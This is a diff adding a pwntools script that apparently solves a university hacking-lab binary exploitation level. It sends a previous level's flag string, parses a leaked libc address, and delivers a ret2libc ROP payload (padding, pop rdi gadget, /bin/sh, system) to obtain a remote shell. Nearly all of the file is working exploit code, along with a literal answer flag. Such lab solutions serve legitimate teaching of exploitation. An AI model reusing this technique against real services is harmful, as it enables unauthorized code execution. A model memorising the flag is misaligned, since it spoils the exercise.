8

4/level8/test.py

@@ -0,0 +1,52 @@
+# 0x0000000000401293 : pop rdi ; ret
+
+from pwn import *
+
+HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4008
+p = remote(HOST, PORT)
+question = p.recvline(timeout=2)
+print("[+] question:", question.decode().strip())
+
+question = p.recvline(timeout=2)
+print("[+] question:", question.decode().strip())
+
+payload = "hacklab{0nly_n33d_0n3_7iny_1nfole4k_Bv4KxlTP}"
+p.sendline(payload.encode())
+print("sending: ", end='')
+print(payload)
+
+question = p.recvline(timeout=2)
+print("[+] question:", question.decode().strip())
+
+question = p.recvline(timeout=2)
+print("[+] question:", question.decode().strip())
+
+#p = process('./level8')
+
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+puts_offset   = libc.symbols['puts']           # e.g. 0x080aa0
+system_offset = libc.symbols['system']         # e.g. 0x04f550
+binsh_offset  = next(libc.search(b'/bin/sh'))  # e.g. 0x1b75aa
+
+print(hex(puts_offset))
+print(hex(system_offset))
+print(hex(binsh_offset))
+
+#help_input = p.recvline()
+help_input = p.recvline()
+print(help_input)
+puts_abs = int(help_input[-15:-1],16)
+print(hex(puts_abs))
+
+p.recvuntil("What do you want to talk about?".encode())
+
+payload  = b'A'*40
+payload += p64(0x0000000000401294)
+payload += p64(0x0000000000401293)
+payload += p64(puts_abs - puts_offset + binsh_offset)
+payload += p64(puts_abs - puts_offset + system_offset)
+p.sendline(payload)
+
+print("payload: ",payload)
+
+p.interactive()